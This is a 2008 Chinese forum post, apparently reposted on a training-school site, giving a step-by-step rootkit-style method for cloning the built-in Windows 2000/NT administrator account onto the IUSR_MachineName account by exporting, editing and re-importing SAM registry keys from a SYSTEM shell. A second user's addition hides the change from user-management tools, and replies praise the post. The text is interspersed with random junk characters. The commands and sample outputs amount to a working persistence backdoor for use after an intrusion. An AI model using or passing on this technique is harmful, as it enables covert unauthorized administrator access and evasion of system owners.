青华模具培训学校

 找回密码
 注册

QQ登录

只需一步,快速开始

青华模具培训学院
查看: 3272|回复: 2

克隆管理员帐号的方法

[复制链接]
发表于 2008-7-26 08:20 | 显示全部楼层 |阅读模式
[url=]减小字体[/url] [url=]增大字体[/url]
经常看到一些人在入侵一台Windows 2000或者Windows NT后堂而皇之地创建一个管理员组的用户,似乎当管理员不存在一般,今天偶违背一下偶以前的初衷,Share一个类似于RootKit的玩艺,当然,这些过程也是可以用脚本实现的,但是我就不写了,OK,Show Time Now。
; P9 r, x' p% p4 l$ Q: u8 p0 g
0 M# r$ ^( c: C* |* \1 t, q首先要让大家知道的概念是在Windows 2000和Windows NT里,默认管理员帐号的SID是固定的500(0x1f4),那么我们可以用机器里已经存在的一个帐号将SID为500的帐号进行克隆,在这里我们选择的帐号是IUSR_MachineName(当然,为了加强隐蔽性,我们选择了这个帐号,所有用户都可以用以下的方法,只不过这个用户较常见罢了),测试环境为Windows 2000 Server。 9 }9 l1 g, ?1 T. V+ M1 E2 p

1 O6 K& M2 u/ B" O1 N运行一个System的CMD Shell( http://www.sometips.com/tips/scripts/173.htm 或使用 Http://www.sometips.com/soft/psu.exe),然后在该CMD Shell里面运行 : b+ C" b) z7 x$ _/ L9 d; c
以下是引用片段:
! }7 @6 M: K. \  U1 J: D5 \regedit /e adam.reg HKEY_LOCAL_MACHINE/SAM/SAM/Domains/Account/Users/000001F4   
# F" M- G: ^- D: }+ e; _/ T3 m4 H. s
这样我们将SID 为500的管理员帐号的相关信息导出,然后编辑adam.reg文件,将adam.reg文件的第三行--[HKEY_LOCAL_MACHINE/SAM/SAM/Domains/Account/Users/000001F4]最后的’1F4’修改为IUSR_MachineName的SID(大部分的机器该用户的SID都为0x3E9,如果机器在最初安装的时候没有安装IIS,而自己创建了帐号后再安装IIS就有可能不是这个值),将Root.reg文件中的’1F4’修改为’3E9’后执行
* S2 L$ }3 z) Z' `2 e8 xregedit /s adam.reg ) X/ J, \% W/ d/ [
导入该Reg文件
6 H2 x. S, P7 K, Y: T3 A
* a: J2 Q5 b# o然后运行 0 a9 J) }, ]; d' f, [! c
net user IUSR_MachineName Sometips
8 ^7 s% s0 F& Q! M/ |' P修改IUSR_MachineName的密码(最好使用14位的密码,越像IUSR_MachineName的密码越好)
  A" y( D, m: n- |. w" H$ ^6 H: e* j9 M3 t: z% V1 R1 o
OK,大功告成... 1 f) J1 t9 c$ D0 H

7 k9 C. |- [* d5 g: N+ J这样,我们拥有和默认管理员一样的桌面、一样的Profile.....
" i; L. k' \) e9 g1 h4 d1 c而且,当我们运行 net localgroup administrators 时,看看结果:
' c- Y8 y0 u, ]以下是引用片段:8 y5 ]. J, `/ E
C:/>net localgroup administrators   7 x; Y* j% ?, ?' y2 q* s
Alias name administrators   / c- A' i5 N7 k- Z; F4 Q% W
Comment Administrators have complete and unrestricted access to the computer/domain   
: g/ R6 [8 x! F0 \; [8 J- h1 E5 y/ I; p
Members   
# S, q* |7 O% Y5 p4 p- b  }, y
( ]% O% D" A4 [-------------------------------------------------------------------------------   # s- {9 i9 s' r6 k
Administrator   
7 k. |  `! ?) G/ A) P2 |The command completed successfully.   
+ \; S/ y! ~1 i& ^
2 E. W% [' _5 c  h4 ]' e再看看USER2SID的输出结果: ' `2 x6 Q. W" z: S$ ?3 Z
C:/>user2sid Administrator , D' I, L: v5 c+ C' O& J
0 w6 U6 M5 f. T- ^
S-1-5-21-1004336348-1078145449-854245398-500
3 W4 S1 d) J" b/ T) @  m6 G& r8 q1 Y+ o
Number of subauthorities is 5 ; z) }( R' }. `, o
Domain is IDONTKNOW
0 F4 b& S+ ^& y( v( lLength of SID in memory is 28 bytes
6 {- I( S: [" E# ^! l. W- cType of SID is SidTypeUser " |8 j/ H9 g; v
) D( ^; l& j% O7 @$ }5 S, G! _+ D
C:/>user2sid iusr_machinename
0 A; P* B5 T) ]% j' f7 X
6 M7 @. c+ H& H' o2 a4 {S-1-5-21-1004336348-1078145449-854245398-1001
/ c, T. T( o9 o1 L" k& I7 V& x2 X7 w
Number of subauthorities is 5 0 E1 c" p6 o( p  M% i& n  B" N
Domain is IDONTKNOW
2 V1 B; o! V: Y# W9 o- q+ BLength of SID in memory is 28 bytes , R- w/ @1 M( s5 n
Type of SID is SidTypeUser 9 m3 n  K: \2 U& ?- a2 c

# B9 |- X( X1 Y# D$ o/ Q  @' x我想,再高明的管理员也看不到任何的异状了...而且,随便管理员改成什么密码,我照样可以用IUSR_MachineName,密码为Sometips登陆...(没有哪位大侠级的管理员喜欢经常修改IUSR_MachineName为其他的名字吧)
$ _- t9 Y8 m. h8 q/ m- N4 `* G5 a) y6 u
^_^,这算不算RootKit...
: L- |( F/ ]% Z. P( @
) k+ X8 D# s0 e# p& l" x/ f) ^附:
1 _7 y7 |" {1 X# X5 a9 @- K1、感谢叮叮付出需要reinstall OS的代价...
' `$ w. Y% m4 w# C$ Z- U2、任何用以上方法进行试验所导致的系统无法使用均与偶无关,偶均不提供技术支持... ' s7 E4 H% c$ j  @
8 P9 ^9 }* c- B: R2 G9 `) ?
----------------------------------------------------------------------------- . P' q) q& }# p, k* E

$ w; m% ?. y& Z# Z# S4 N叮叮 的补充完善
* ?; v" o5 l6 E- U7 L! F
! u* R8 F% Q' @9 ?0 v% Z* I; d很多人提到使用了管理工具的用户管理后,能够发现IUSR_MachineName被提升了权限。 7 [7 i! {4 n  |9 [# Z; P
现给出解决办法。 6 \9 y- }) N" w$ x+ e# o

" H9 l' m$ z$ u方法同上,不过这次修改内容多一些。即
+ B3 q3 l) H$ [1 b) v  v$ [! B# K8 B这次要导出两个key内容:
3 B; a1 K# S3 z' K' v一个是adam提到的 - M; Z  \9 ]9 V0 o- z+ m
以下是引用片段:+ F' ^( m" Z+ d; W% f
regedit /e adam.reg HKEY_LOCAL_MACHINE/SAM/SAM/Domains/Account/Users/000001F4     l% M/ Z, O  S

* ~( r3 W9 K+ F8 Z. E- S然后另外一个是你需要修改那个账号的值 " O4 [) w: W+ W0 t  `
以下是引用片段:
7 a+ i5 p4 w6 Qregedit /e iusr.reg HKEY_LOCAL_MACHINE/SAM/SAM/Domains/Account/Users/000003E9 然后按照adam提到的修改adam.reg , S# K) B/ \9 k, u
“将adam.reg文件的第三行 以下是引用片段:* G# D* ~  O* F1 q* |5 t
--[HKEY_LOCAL_MACHINE/SAM/SAM/Domains/Account/Users/000001F4]最后的’1F4’ 3 d% Y. X1 v% J' A, S
修改为IUSR_MachineName的SID”
& T3 ^9 _8 L- i0 {# A- o/ P4 M% i6 M4 x3 w
现在,你还要从iusr.reg文件中复制一下内容 7 E; A; o$ Q4 h6 F
就是将iusr.reg文件中“’V’=hex:0”开始一直到iusr.reg文件结束部分复制下来
/ Y) |( N0 W/ ?, B& L然后替换掉adam.reg中同样位置的部分 ! ]- B+ p2 ], U! d0 K( p' N# p) k1 x

6 i& R: V% t1 N4 ~  L& [  }最后使用
5 Q" y, e* c, i9 ^0 u& yregedit /s adam.reg
* ]6 y" n0 O* ^4 Q8 s9 v1 J导入该Reg文件 9 o' S, e2 R2 R( l
呵呵,别忘了给这个IUSR_MachineName改密码哦。
1 D6 F: w# j- bhehe,ok,大功告成。
2 i9 B: L6 X* O6 `0 u现在IUSR_MachineName账号拥有了管理员的权限,但是你使用net.exe和
1 B4 |" L  S; V/ I$ H' R, w& D管理工具中的用户管理都将看不到任何痕迹,即使你去察看所属于的组和用户。
) Y# T/ T8 G5 d* E& |5 A都和修改前没有任何区别。
发表于 2008-9-2 10:07 | 显示全部楼层

不错不错

不错不错
5 A7 Z7 {4 W+ e& R赞一个
发表于 2008-12-30 13:32 | 显示全部楼层
不错不错( n7 `, b( B4 ]7 k6 g
赞一个
您需要登录后才可以回帖 登录 | 注册

本版积分规则

QQ|关于我们|sitemap|小黑屋|Archiver|手机版|UG网-UG技术论坛-青华数控模具培训学校 ( 粤ICP备15108561号 )

GMT+8, 2024-6-20 03:32 , Processed in 0.085154 second(s), 25 queries .

Powered by Discuz! X3.5 Licensed

© 2001-2023 Discuz! Team.

快速回复 返回顶部 返回列表